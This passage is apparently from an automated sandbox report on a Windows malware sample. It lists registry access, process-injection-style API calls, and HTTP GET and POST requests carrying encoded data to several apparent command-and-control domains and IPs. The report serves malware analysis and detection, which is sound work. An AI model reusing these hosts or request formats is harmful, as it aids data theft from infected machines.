HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\Windows Error Reporting\WMR\Disable
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy\Enabled
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\GRE_Initialize\DisableMetaFiles

Write Keys

Nothing to display

Delete Keys

Nothing to display

Mutexes

Global\CLR_CASOFF_MUTEX

Resolved APIs

advapi32.dll.RegOpenKeyExW
advapi32.dll.RegQueryInfoKeyW
advapi32.dll.RegEnumKeyExW
advapi32.dll.RegEnumValueW
advapi32.dll.RegCloseKey
advapi32.dll.RegQueryValueExW
kernel32.dll.FlsAlloc
kernel32.dll.FlsFree
kernel32.dll.FlsGetValue
kernel32.dll.FlsSetValue
kernel32.dll.InitializeCriticalSectionEx
kernel32.dll.CreateEventExW
kernel32.dll.CreateSemaphoreExW
kernel32.dll.SetThreadStackGuarantee
kernel32.dll.CreateThreadpoolTimer
kernel32.dll.SetThreadpoolTimer
kernel32.dll.WaitForThreadpoolTimerCallbacks
kernel32.dll.CloseThreadpoolTimer
kernel32.dll.CreateThreadpoolWait
kernel32.dll.SetThreadpoolWait
kernel32.dll.CloseThreadpoolWait
kernel32.dll.FlushProcessWriteBuffers
kernel32.dll.FreeLibraryWhenCallbackReturns
kernel32.dll.GetCurrentProcessorNumber
kernel32.dll.GetLogicalProcessorInformation
kernel32.dll.CreateSymbolicLinkW
kernel32.dll.EnumSystemLocalesEx
kernel32.dll.CompareStringEx
kernel32.dll.GetDateFormatEx
kernel32.dll.GetLocaleInfoEx
kernel32.dll.GetTimeFormatEx
kernel32.dll.GetUserDefaultLocaleName
kernel32.dll.IsValidLocaleName
kernel32.dll.LCMapStringEx
kernel32.dll.GetTickCount64
advapi32.dll.EventRegister
mscoree.dll.#142
mscoreei.dll.RegisterShimImplCallback
mscoreei.dll.OnShimDllMainCalled
mscoreei.dll._CorExeMain
shlwapi.dll.UrlIsW
version.dll.GetFileVersionInfoSizeW
version.dll.GetFileVersionInfoW
version.dll.VerQueryValueW
kernel32.dll.InitializeCriticalSectionAndSpinCount
kernel32.dll.IsProcessorFeaturePresent
msvcrt.dll._set_error_mode
msvcrt.dll.?set_terminate@@YAP6AXXZP6AXXZ@Z
kernel32.dll.FindActCtxSectionStringW
kernel32.dll.GetSystemWindowsDirectoryW
mscoree.dll.GetProcessExecutableHeap
mscoreei.dll.GetProcessExecutableHeap
mscorwks.dll._CorExeMain
mscorwks.dll.GetCLRFunction
advapi32.dll.RegisterTraceGuidsW
advapi32.dll.UnregisterTraceGuids
advapi32.dll.GetTraceLoggerHandle
advapi32.dll.GetTraceEnableLevel
advapi32.dll.GetTraceEnableFlags
advapi32.dll.TraceEvent
mscoree.dll.IEE
mscoreei.dll.IEE
mscorwks.dll.IEE
mscoree.dll.GetStartupFlags
mscoreei.dll.GetStartupFlags
mscoree.dll.GetHostConfigurationFile
mscoreei.dll.GetHostConfigurationFile
mscoreei.dll.GetCORVersion
mscoree.dll.GetCORSystemDirectory
mscoreei.dll.GetCORSystemDirectory_RetAddr
mscoreei.dll.CreateConfigStream
ntdll.dll.RtlUnwind
kernel32.dll.IsWow64Process
advapi32.dll.AllocateAndInitializeSid
advapi32.dll.OpenProcessToken
advapi32.dll.GetTokenInformation
advapi32.dll.InitializeAcl
advapi32.dll.AddAccessAllowedAce
advapi32.dll.FreeSid
kernel32.dll.AddVectoredContinueHandler
kernel32.dll.RemoveVectoredContinueHandler
advapi32.dll.ConvertSidToStringSidW
shell32.dll.SHGetFolderPathW
kernel32.dll.GetWriteWatch
kernel32.dll.ResetWriteWatch
kernel32.dll.CreateMemoryResourceNotification
kernel32.dll.QueryMemoryResourceNotification
kernel32.dll.QueryActCtxW
kernel32.dll.GetVersionExW
kernel32.dll.GetFullPathNameW
ole32.dll.CoInitializeEx
cryptbase.dll.SystemFunction036
ole32.dll.CoGetContextToken
advapi32.dll.CryptAcquireContextA
advapi32.dll.CryptReleaseContext
advapi32.dll.CryptCreateHash
advapi32.dll.CryptDestroyHash
advapi32.dll.CryptHashData
advapi32.dll.CryptGetHashParam
advapi32.dll.CryptImportKey
advapi32.dll.CryptExportKey
advapi32.dll.CryptGenKey
advapi32.dll.CryptGetKeyParam
advapi32.dll.CryptDestroyKey
advapi32.dll.CryptVerifySignatureA
advapi32.dll.CryptSignHashA
advapi32.dll.CryptGetProvParam
advapi32.dll.CryptGetUserKey
advapi32.dll.CryptEnumProvidersA
mscoree.dll.GetMetaDataInternalInterface
mscoreei.dll.GetMetaDataInternalInterface
mscorwks.dll.GetMetaDataInternalInterface
mscorjit.dll.getJit
kernel32.dll.GetUserDefaultUILanguage
kernel32.dll.SetErrorMode
kernel32.dll.GetFileAttributesExW
mscoreei.dll.LoadLibraryShim
culture.dll.ConvertLangIdToCultureName
kernel32.dll.lstrlen
kernel32.dll.lstrlenW
mscoree.dll.ND_RI4
mscoreei.dll.ND_RI4
bcrypt.dll.BCryptGetFipsAlgorithmMode
kernel32.dll.VirtualProtect
kernel32.dll.GlobalMemoryStatusEx
kernel32.dll.GetEnvironmentVariableW
kernel32.dll.SwitchToThread
kernel32.dll.CloseHandle
kernel32.dll.GetCurrentProcessId
advapi32.dll.LookupPrivilegeValueW
kernel32.dll.GetCurrentProcess
advapi32.dll.AdjustTokenPrivileges
kernel32.dll.OpenProcess
psapi.dll.EnumProcessModules
psapi.dll.GetModuleInformation
psapi.dll.GetModuleBaseNameW
psapi.dll.GetModuleFileNameExW
kernel32.dll.GetProcAddress
kernel32.dll.DebugActiveProcess
kernel32.dll.WaitForDebugEvent
kernel32.dll.ContinueDebugEvent
kernel32.dll.DeleteFileA
advapi32.dll.SetKernelObjectSecurity
advapi32.dll.GetKernelObjectSecurity
ntdll.dll.NtSetInformationProcess
ntdll.dll.NtProtectVirtualMemory
kernel32.dll.VirtualAllocEx
kernel32.dll.GetThreadContext
kernel32.dll.Wow64GetThreadContext
ntdll.dll.NtUnmapViewOfSection
kernel32.dll.ResumeThread
kernel32.dll.SetThreadContext
kernel32.dll.Wow64SetThreadContext
kernel32.dll.WriteProcessMemory
kernel32.dll.ReadProcessMemory
kernel32.dll.TerminateProcess
kernel32.dll.CreateProcessW
ole32.dll.CoUninitialize
kernel32.dll.CreateActCtxW
kernel32.dll.AddRefActCtx
kernel32.dll.ReleaseActCtx
kernel32.dll.ActivateActCtx
kernel32.dll.DeactivateActCtx
kernel32.dll.GetCurrentActCtx
advapi32.dll.EventUnregister

Execute Commands

"C:\Users\Seven01\AppData\Local\Temp\YWMUNUJU.exe"

Started Services

Nothing to display

Created Services

Nothing to display
Behavior analysis details
Machine name Machine label Machine manager Started Ended Duration
Seven04b_64 Seven04b_64 VirtualBox 2018-06-06 19:44:08 2018-06-06 19:46:59 171

16 HTTP Request(s) detected

http://www.bddxpso.info/hx328/?Ezu=XhU0YWRstFMBDjLH+tKhkgktGx+EoAwrQ+4lU+sR33hZ0fQAyUpJ12zIbgg0WvY6YJmFA81w&Rxo=M6hH4XnpE45t
  • Hostname: www.bddxpso.info
  • IP Address: 199.192.19.196
  • Port: 80
  • Count: 1

GET /hx328/?Ezu=XhU0YWRstFMBDjLH+tKhkgktGx+EoAwrQ+4lU+sR33hZ0fQAyUpJ12zIbgg0WvY6YJmFA81w&Rxo=M6hH4XnpE45t HTTP/1.1
Host: www.bddxpso.info
Connection: close

\x00\x00\x00\x00\x00\x00\x00

http://www.minipoco.com/hx328/?Ezu=IkLoxDcWpx6tGIyXmZD9YO72U/esdZB8S44sEvCynj0e3Eg7oJTxqNF/W2XzQFInsuBab2yT&Rxo=M6hH4XnpE45t
  • Hostname: www.minipoco.com
  • IP Address:
  • Port: 80
  • Count: 1

GET /hx328/?Ezu=IkLoxDcWpx6tGIyXmZD9YO72U/esdZB8S44sEvCynj0e3Eg7oJTxqNF/W2XzQFInsuBab2yT&Rxo=M6hH4XnpE45t HTTP/1.1
Host: www.minipoco.com
Connection: close

\x00\x00\x00\x00\x00\x00\x00

http://www.minipoco.com/hx328/
  • Hostname: www.minipoco.com
  • IP Address:
  • Port: 80
  • Count: 1

POST /hx328/ HTTP/1.1
Host: www.minipoco.com
Connection: close
Content-Length: 2197
Cache-Control: no-cache
Origin: http://www.minipoco.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://www.minipoco.com/hx328/
Accept-Language: en-US
Accept-Encoding: gzip, deflate

Ezu=AGHSvmxw0CmMG_C86M~iPp~YYsy7a6g3PPVyP9m2li4pwWgYhvjl9LNoZBDLGTAT9Pt_dyjiFrMzMPB3sU8RouHkGaM3D1WlXoHqhjHgGyt7HFCDh5D2J0(8JfuVTju8X4ua3sOaTjD5hgsmgFj1QeU5XgCKytcWxbRrHdE_V7YKOSanHc4a95TqgDuZ9_fT0JcKAqdG~HUbdquMaq9V4RmTlEJgGHO3mg(Pn6YcCSZdRvgayvJygeBwbcu47RiXcJlwqGp9NTVOkRSeF8FiDZQ3TDVLjhDaCnhA~xnuRpLpbaZFu2i7PDud3hJBX0T3V2HTCGDC~TNYSJYO604-FE(o(6DuzlShNrPgbiE8fBE6ODZClnHb7mVWcuJxb24DpCCfYgo25Of_nlf2HNl7HVCrJ5wYKWcHnOhMvtKa(gA0vu(xMNaaxW0sad2gGb9TMfmp4OUoi3OkBBJIH2ZDlCBRhG~Wy3VadJ0LQ4jeZDPgIXz9n31kQCsRBnJu61m6kd(K6pRtyxRrf8vCrJPSupn3A3vFfBWtYRhfvYqEqMcOMePC6oEt9LgIR8oXVcvAYptzOR6IvBFypfMsikeH4JY4lpqgf-HkVo32xyjV9Z2RVDSXtCkZfTtt6ySzLaYZ(_EnUygegubgcO8WOTy6EesUZI1tmBruZS~oIktWrfd1cmYzxyb8QpI1YqoriU7V361G2jWxGtXa4pWCiG7M1LyRx-GwUGmdrVuzYZHPM-rRStJRQnKCmR(PmxwK2y1ow2Koep9Zl1I6eZteRrlA3tKhIzSq8hYDW9eiUwpZXPR6rxc_FmmOEYpSaelIY6Ux~xLgIOjWzM5e7O2PCfjgIfyNEE2bEl(6mGL4FtIv6U~rZ9vGBJR-7VEif5iC3irwb_cPzfouNmHh9EImRiSGMt61ghKBVW7QnBiPn0JI5fPqahE3VQZ-ZY9Zo30l5V0k1laVvzMHyy4f1E(9i5ZkEEisrCRM~_ZdKtLoPJHNUY6MoHQdlRWiytSSP1f8z4sYy22KEWdnP8LpBWfZg4DYKHEK6yHLpXsdMEWmG2evGBzS7esPbuV2KsT7v24rfthaE9SklsiBoF5xOWH8hFVBCcKIzeeY0igjXyquTgwaL8V448eCPMfw~K8MOgjrVuydiWYDjQCSeHIeP4jB5Eu9tHf4Jns7q5HEnqR5ZmIgFSQen-dhso7163lytXP4l0ipnDhBjaSBBxW-vlFPgtUJuDD9Zjc3hbUVX-7yca3tVMOhiiK2(YH-(TxturgdR7Pk0f(ZPr3ipBceFwlyEcqyDtH6el2rWyhY~d5vVQVMCqVlZEt9C3us0Go4frANqCzQDdi8kBIMp19LlvNoIoBsGelU6U(pJs35fgb6vnoeiduf(_IZDu4LQPkM8Q1wHyvlMQj2swKiVrJ2pudibUgWlyMnqe2Neu5iA6wG2yUhLc9k01q76LyF~dEMlutSDWLjh5rEgcbphnDoNS0UCyHhG5TIMBab865givyutJMUIB~gUqFkBkrCNyXu0hBO11O3~C3KvISsEnQeE-d-IzQoqAVZkB~A14HAX0ScHYUl0ZrM~OLSBUorzw3Yy6F9dPnFrxQkYaL5PUkJxNvjUJLGXbeSx6OjH74yoR2yNXh15W4ecr~2CfM5SoxlkKJGiY6hfSl4m6YND6Llbcws~uPIfLCXhNmGt631eFDSnjr6B5IV6X7-csJRl-92VYysZMhLM11bxsj0233nFgdpc1vMG268aZDmbdcSYUEwzIXAJOkhkAeeCxyBqh5qkmGb(QV4~xmjTl05SwOQXxFRidRA64trpjLBvwVAM1MrB3iRfhVy~x6W3ewHaynDmLb6fNhweShM9zf0w50gtJFZajkcv0s3Tqf-y2kX~lLQFEXntYoKVMeXvTMFvatvU9IffPDb7GdTl4xPS6OA~iS5mi~EF-1rAMO8r8Iw3CeyzBAEACfdj_6F6rU7qh7MymJxq64HNf63Q5qSkJ20jeQoRdlVDzr6t0Z7WxvW0QBtssX15IVwI6P77Cap~JVBg0gTsY5GGfrqMrI0hFdFwElIsgitiw5dBsxYUaAMZScnkhKGR3s1mli7DVXU4GcNc1raxxDAoZMx5rLRG0AjawQrRTtNv2vjN5u3Kq7ticlA6944DfFDsKOnbdGtEzRHf-zvUQm1Nf7HGciPUygb\x00\x00\x00\x00\x00\x00\x00\x00

http://www.minipoco.com/hx328/
  • Hostname: www.minipoco.com
  • IP Address:
  • Port: 80
  • Count: 1

POST /hx328/ HTTP/1.1
Host: www.minipoco.com
Connection: close
Content-Length: 57341
Cache-Control: no-cache
Origin: http://www.minipoco.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://www.minipoco.com/hx328/
Accept-Language: en-US
Accept-Encoding: gzip, deflate

Ezu=AGHSvkRK3yyRQNaDrdvlLJPoQ8GlTJBDG8NfP9WytAA7mGQYpMbu0LMaORDIQjEF0_FndzncFrUwEORyq2U8gebYZudpSgKmQK6pxSPgDCZ1Yj2UyoP6UELEOuWmdwXqY6Ce(NumXnPwuhsCgnD5UeA6fHqMzO5nyaRzCdMWKLcEYS7EHYB9wYiWogPtjdXpjuEKCaFW5wgdYpnJZ5FCvQX9y05nDXusrCnfjbMNAXlRbfRv(vdltvRNV9mh7ALRMfVogGFsPhZCrgyqDfJqCph_dkpLtQjcFh9YwxnNcJTbS6Z9u2WJOweGrRJHYX3eQQuAMjmH9GpYTvcd43Q6Jk~22KT142GqNrf8VyM8eEc6YX9FqHHbyGVUcuJpb246pEeTZjI2t8H9lTLgAe4KaFCvFdkeOX1QnNBqvM2a8Q0zqPv1E8ab~0o8PtOwGbhKNaW11Ls1h3OnKVh9Wi1P9mFCjHmt~mk_apg-QYrSXiD0A33H3154W2p7FmV23kKrl97grcJZw31lfP2VvtWJjJ3ILR7tKxGScgZyvJvY(-U8BeDVsrwh4uA7WIMVR9fBJo1wGAyH7hIz~7c5jB~5(axFtvPcXfvGapfW1VP066TYbRyPyiIxaxVHvgWLM6scz_0bQgY9ze7FC-UeMzmGK9U0LIpLvUHbGjaLPGJzs9RISXMR8CPMUO8pe8k3kxH9oJ1y~g2sE_6o7YC-gxL308(5teW4URCwrVmvfpTPP_PRDcJQQGKF9R~loRwWyyxOwzu0dp5Zw3g0MKFDW7BnztKpKx3q4iBzW-y2FERJTNR9gjUFGmmFG9JpYZtVbLEb5BPwGeuJiZNw9dOGSqLnMcLFW1KJfBOWunn2Bd509mORccL8MsFm22tkGIKV9TflI6gp4vMXFFfQlGxcRH2oDNWevDDAVFDwtRrvlXF23OivQE0jHz87K8wRoF0X43Qw3RnViWkR(iNf0FjNm4BBGVbIrh8vjORQA9riDaHWYpix424H4g6J8OiGdXzGmshy(mT5MFUZJtTIGBKq5bvgM0UU4iy_k1R4Iz6dBEfNESfj6MAZFPZSJOjZ8AJ7SoNsbaOhxPCAtgVyImjA6RcsK_bug-2TiRIpX2OESEQaGsd44s~CIIXNjJpLOQvLW-GEp1sdkyazcUgXeoPixEGJoV6vMU8ukbqajaJHYRFaFQAekdp3noXY7z0tlXXakna-g15VqKGsIk6kjzsZuPI2hxThaXQMgI8ub8~JfYeVVdiX5Cyj~eSeizF7l6YLX7q8282FXLrlmykKYip0S-26JoibGVC-InZu7sQnNTVvHLdzbHICLDq-9GV3R4YGkRf0U_XEtlAK3E5t4fp8HKQ7JchxzDG6UNbTIBP3vEIPjsyt2s1RNsoKQu8V5BVsKjitLhmIoCLCTvJEn-JvWUID2GkvvcyVHalKbq9byipUOP9K(Hey266a(dEZv65dIUrjh5yPtcn8v2fiKGpiVEyBA9HFZw6z(4M1qPWb~bp3EDu8ap98CUjgLyn-iRUEyFm0ym2Ep7C5CQMDPN5-KCwZwRFpigXB6oWhCmiQL41q0aPB~vzdHC0oxRDFiLlfZuS59CwRVP3rX1c7~brjYYXCd46Oy8fsG4Q2hUu-b0Nf~mlZd573TsVeXcJjgrhWm7DpOigVnaUvO5XpL-Y3nOCQQPO1n9nHrZ7LMlP6nmP1EvQW6WD9Udhklttsc5iVYK9pJSwCzMDwwEn8eSl6UU(ZLn(RfbH-a_08VTsM1P3SGbA3zgmkbTKQmz8emX~8u2B8rSCaZEUUQwrnTRJqlrUIjoxskRLAvS5UBUlII0L0K3hrpCak664EUDfFlqDHHsJ1XAx-vk73j8cg9bNkZDYO~EElP6CEvSw38kGoHmPyt9VoX8WWvTkhnKtNTe4hQsrUiwYO9KMcOryh30W7szGEP8QECMXau_kLwBfz1g0NBhjmytKLz9MtoxHjzXRQv604F5i6aamAv6i17OEcf8piQTCVh1VDW1zF4zlMrcbw1rJvbart6T3N4ao8ojkjgpl6L-O-N7RBmEps9mN2kgGumi5yBepqQeMGYwY5pDa4IFYe8RKqN0PUg3ZPI2(l8A7I65xH~aOnZl88MDcPF1J6w2q_I-CFDN7moI1X6b0zH45ajJmlf9CCQy8wfOf_bn6qFMStCby-cFxBD6SD~UyXFWI756EVeQGOzOk2KY7p(TxAEpHR7CbXBfFEsvVjAhIKJ59oFMJzsUKso8KbRsQgF3GcB18TTr5_PqL1y-Hxo6XktN30y2K1MN6lqiVGiHiAHRqiQBdcYkXpLUuTJUDIYPu5(B8beBtIXY2guWRHlWBg71ZfLlUHF24FXRoLTCbA(hBGjCke1j6ez6rnl6zdzvUVeErxKq3B3oMI~6iqC5V

http://www.longshot-systems.com/hx328/?Ezu=Erw+cP4nY+XszMfRBpQEDemYi5Fdujc/CCnzD69U5NfgNF3nadtuKhLZMPhMmLDIp/p8MiLQ&Rxo=M6hH4XnpE45t
  • Hostname: www.longshot-systems.com
  • IP Address: 162.255.119.24
  • Port: 80
  • Count: 1

GET /hx328/?Ezu=Erw+cP4nY+XszMfRBpQEDemYi5Fdujc/CCnzD69U5NfgNF3nadtuKhLZMPhMmLDIp/p8MiLQ&Rxo=M6hH4XnpE45t HTTP/1.1
Host: www.longshot-systems.com
Connection: close

\x00\x00\x00\x00\x00\x00\x00

http://www.longshot-systems.com/hx328/
  • Hostname: www.longshot-systems.com
  • IP Address: 162.255.119.24
  • Port: 80
  • Count: 1

POST /hx328/ HTTP/1.1
Host: www.longshot-systems.com
Connection: close
Content-Length: 2197
Cache-Control: no-cache
Origin: http://www.longshot-systems.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://www.longshot-systems.com/hx328/
Accept-Language: en-US
Accept-Encoding: gzip, deflate

Ezu=MJ8ECpN2Ypfky4HDC9ZiUPv61Kx1tCQKZny5GrZWuNehFWLZX4MgJHWRBq0v4bL2weYDNl6LMxQ9ChBGT_Ks2Evc4DHhYC7F2r~R5-JxpfXfrZkNK6rM2TwVhR(mINq3SoXtdVRO2F2B6E5PEelpQ7fKAL49roV2E8b65G~0i8Lh2KjcxCc5m5JQ~BJI(7uoDRgoX39MkBaynSOUXjNEijafrybSWTU-eLLwHF9dKhfyO6UqdWvLFKJByE2xqFYc5DlDGxP7ACgUuXt8OrIM2mpOafJIC2JsE3(LiLBKT9IDJ7G17cbN1Tx8Qjx5JqndeB6NWgCJz9hP4lEL0Q~g5GfkgKkXwjPB5N4eNVW6xIb_ohZOM3J7UGQKAeBEqXwCqGbfVuImDq0luvecSaOePGWkhKnrV3N_TfEdFtxujIW3FEl3XzdJzUURg2WLRJwArd8T4iYUK9xRZ6yfCy0nNnlSZ3bEsk~EV3xymIvqIxMVTjjeZWVu9TggZj~D9x~pq4vA3N21Gl4gDYovZxZMG09ccpWsfLjo0YIPfHXUn_hVyFDLDIkhXBzbylUtki5ftecgM1KQhEno1Dred0FBod~acknHWPzJumIIOkFPnWcUp-4IoY4DNxDdhJ(FNuxXZqxJ~guXbVho4NjzCnidZhzIUcGAcSF1zwgs6Zf928RGUzEgBQRtBeg2W-yWydekvXymA2J3OD4p6_kI1VnX7ckIE9YLIiRqQRBPl9fztrZwAmZoUZdL1y08am0QsihXS33ScptPeIZjcb4dz4qSm8vNFeQ6YFJLShz16MUQNSrOgd(LkhsFccNzp7PxgRLZS94QtBLW4dwYozYUEXqw3s3LdGa4iLQC7R(hyhw2KBJnuf1VIgrtc06pJl~GZTKK9Jyz2vIulvd1Z29O3z(fjZMdn6pk9yWJxtMh~XghNpxKgb4AiMtNl6QeFo92IhAL(OTOi0R1gdGfQSbHVJidaggAUfECrbBIyw6xk3mlAIW0a1YfYKzHLMz2YIHr5acQ7zEAp2dJF8ica69JZnylMzbi06jYJz9WzZGP7iBxZvdDbD79IvwIZFNMUJcfXP3FWDuq2GqmFx(notxz3GKBabQNzhxcncvvtJOCHrbgqckKCAQ-F-ON2CYQ2sR_HB(yQ7I3ZLdk9YEPSNCZNJaoaUdcY6aLH9rd7y2-fBThYx~7QjdG0FlSE0~aThYzUtDdhrZOV0HvdYoqFmbpkfPtswrgd6ZApdZFzarpZHFwjJjwIxP8c-DOQQ5y~W0D7B0iLYkEk3BHPCUykphsvSUiJ97HSk~eHL0AfAqw6uYPkhVspPm55hVIfVoyTQNvSAruejpKPa4wjddR6E72Mx~_qEtL2_NVYObnkgvupL3xhy6YUqd9MCo1SRG4p05QFviKEaammei1Dqk0bSLOnfH7571OJmeSzZIlSqC6RiYBk07_p3N46BYq4n93SW3Q~XiKW3Z-wCVAOe1EL4HxV24lbhuboZrJmNNjXqftcebWW-adEZIbpuJp5-ddDJzQOwzpJBk9RTaAUSNlAbamuHdTL_iMrPIwufrhyW6j0tCo9-FDZuGBvFe0YyzFQqjeKZW3UshO9jk-keI9YbOTGyXGw-cDyf5kH746~O9fXQHO7xlRDvee2HJmYe0IqPyni7zD7jHU3XLQISW4KOGftVvBXtzFgNUPxXYWdvvKkuQbxSDPeVbNO9KY7l8z2pqQKzZQVabnR7QBbe7gMFMr(cQGvfZd3btK1GDdbIfeJ3hXS5Tgb54GN8c5b_qYBYmWNAQGkGecBRBJ4BwSBIt7F4x7vJl8oNoj3zDETqM8MeJt9brt~hcQ1yeTjIa3U7jvJHE4OG78HWXivEulMxPDF8HbNL(O4OZNCBQmu6FtX2UkpiP5RRFBfGj4X3uTK8jkdfojDdDmcke8(N3HGop4lD5KmkxYTCfXYaTBJq3Zq3OcllM3qphQVW39rEfVwfWHQisjrViNZ7cxHr0u3owdj7JR~NQZ8vJ_m9xesOejX_AGytA5~M2tmmYEODCllUE_rcvPp3TufDELnFFqXu3YRyxVfBvMfyZOwmD31P9CYOEWrvcychq936xah2g7(_JLEViPCm5tyoD4nTgIYYnPg2JIVMU1AbxzJzUF8Q~yVGpusRMD~7ETnI05jRVWRYYOA_6goKSrk7aSH6t2\x00\x00\x00\x00\x00\x00\x00\x00

http://www.longshot-systems.com/hx328/
  • Hostname: www.longshot-systems.com
  • IP Address: 162.255.119.24
  • Port: 80
  • Count: 1

POST /hx328/ HTTP/1.1
Host: www.longshot-systems.com
Connection: close
Content-Length: 57341
Cache-Control: no-cache
Origin: http://www.longshot-systems.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://www.longshot-systems.com/hx328/
Accept-Language: en-US
Accept-Encoding: gzip, deflate

Ezu=MJ8ECoFiIJTPkL(8G4pyRqmChK17uSo1UXSDGvlS1_r-B27ZR6k-T3WSIK0uy73O5uhPNkuyMxIyJgxHVank~0jWnQ61O0(E4t~VpvRxsqDZ279PLPDI(TsX1hX7CdKCSKbxeUwhhR6ejF5zH9Ftdr7NY9k_luIHD9av1mnqrcPR0cihxGlDkIZpryY8gae4HSMoMnFmvji0iQHUU0w8gXe6q2fVJXh2bJzGNAdQGAnuANwCZ2rCaON4oXX2rVEBtgNbZgiNHwsYlmNuPMYE2W4rRItIIGpiFFHQsLBhfZcPCbHC7cf_1htwMzx_U4zOUBiVfByZzMxP4Hsmgimkg2fvja0AmAbO5NpdL1e6yOL_sFFNO3J7dmQEAeBMqXwvqErDUtomBrYnoZKWavO6T2Wovu79EGRbTc1eFO1ug4i0Vl1zfGhK41wBrWebRJ0Fqcs1(HxKL9xQB7eyGwcBESYOXkKhuQW-VXlhlq(uJy5CLTmlfk5ywDxKIzCbjRi4qYLq1oWNRXoqDqwPaVobH0tzI7C-aLTXxpw2c2yV1ZlB8FeLKdkDCQrw43Yv2TpSmNcnFmaVmEqoy3bhdSNvsISQMU7mfuauhnAoYzor2hU1nsZb1ZkgLWCz7b75PPFWTe0CjSnnYHYCtuD7ZG3KdmnCVMLlfXJ5wVYP(77YxbBRRiwGMjFRE84QbMaK~fOMnXaSM1pAMw0m5Oger2709v0bJNoTJQJDQRZLmNbzsr9wEhtpU4dG9C11H21RiCsAS12NdphPY6Bhda4XlOWui8uhDfs1cFozSkqs5MomH3vJwPnHlRsec-JAr7Kxux73SsMAkVKdtLEItgwrSlW3zvvtfmGqsegfw1zn92MmeQB7r-RFEBzlYz~4DAqrdBmT(7rskutUuJxuWQot0XDx55w2odl_9hfx1dFL90sbLv4VyZMqjcxvz7IVFcliJEpK94bF7g5j5dKcXTHVfv(xYxYKU_Qk0KpUhnu3mG~iCfz9ZUQFaOihPOTiYqrRxbESuzgwhm9yDve5WJd1S3WNKA7vnZPTK2Vqt-qs8ARQb8wzY1DrN_8gVCIbCPEifOvVJCyrw0L6HRWXofMC(HPeWIwo10Nx2vHltIf9GK(gus8KDXM-Mfi05TUG3dhLOxLvTJM5fp1N8L8SFfG6UYSAIWYQTqOOeuH-4CuQOmHoYze7QAp5iVBOFwncUCZqU9iLlZ8ZTAmNUL88DmjKhe6JjDb0bIMcpNp28YvJYBR7jdyPKRXTd9r5Skla2Gdh5BgFCbcWwy9eaFJzxqtutRIqD_6sdjOHCoYIVQS30rV5hD0TmsTbtAERHCATUgtaHinwU0Z9B4k2uINz(kPiUk7g22oz4tZlHtOcuU3JsYnahjmQZ7ZQOQI4TwfiiEYLH82fPPifsLnVKLwoGSfDk_vUxr5WMgWK29s8dKOeGwcToDnF~kIX4WFL7n9qbG(-1TSKW0p69CxRPtRKSJHMDgtFOx2Yj7ikhN9pRsz6PsfuRf~JdoIpqdoJxbhNHJ(ufz(qMAwXdCTOXAFBPrOmp39iRNa4rpwsrv7D0V6_xtiw94dIZO~gm1S3By3YDrD8P56OeMpV4WVJvr8UUI2TCDLC6ZMt(5wrG4g-wMZIdDKG7B5FUNqamWp-SLZBtuaJ1ZLaszLgy3GBDhK0PYyuyliHfvLnzNUvinNGcfjYkrlvwDTUeRXKVfKd7WcHv8OtYAQvDIrLQftIQM7_Dm0W08BFiN15yYJC0jnjcvupdHshTLmnRK0kBe11YJyjDqGLaDw8xFKhFQh46B0aZ_N2G7Jsmp46vZ8-lmy3SuAmFdR125Do1zsEywKSr4GLWa6LBUANGXzKLxzhq1ilKS3ASsLvIrGNyts9HwQgs-MQRRw1pDPWZA9GfG7YV3vwMeTaW9AsL6imE2ienMLiDrx2sTxKsm16CHD2ddKnDIHFtXGnkEIqjLRWfFTr7k7AwrS6AyAMpXuMc9dyar4n~oNSi5dApY9XwuEam4F3w4WOAf8Duo0qtOqZn0shPjmdijoD0eLBmTKRFzxqmBcQYPm5WS1WaRGOegB80njt1t5QC80Oyf9kUVKa6bZa3l9_7sdeJmzMGRRo1dLDjys5PqHrumEiR_IuFYxZLxQ30FWlPgtp~hsOx6EVz70g4ic3UOYXAb2lgKDd(dqUXqMc7Mkua5Wc10rkyRPrtA~v19VamJggDhFaV39BkIZaSZa36TmmKxKXOzMhIKryhYatrq6dnhlkzh7ed8P6fQIQGdPZqwRnD3Y-dwCLUErG3VD18cmHK9mtsTMU0cF7YMjWtKFYBQptLoHGgsALe4hwEgHK3NkhB0GE0K9MSfnBvanEwdbld7y06psO2pNZMYW5JlYTbwD

http://www.hfzqspls.com/hx328/?Ezu=+qswScRFOwDuUGNjhbwJUT5gCBe/uhx1cvOEjWtytnKjkuEtQ216QNwQQ+vcFe4VY4J9y/2h&Rxo=M6hH4XnpE45t
  • Hostname: www.hfzqspls.com
  • IP Address: 23.234.41.206
  • Port: 80
  • Count: 1

GET /hx328/?Ezu=+qswScRFOwDuUGNjhbwJUT5gCBe/uhx1cvOEjWtytnKjkuEtQ216QNwQQ+vcFe4VY4J9y/2h&Rxo=M6hH4XnpE45t HTTP/1.1
Host: www.hfzqspls.com
Connection: close

\x00\x00\x00\x00\x00\x00\x00

http://www.hfzqspls.com/hx328/
  • Hostname: www.hfzqspls.com
  • IP Address: 23.234.41.206
  • Port: 80
  • Count: 1

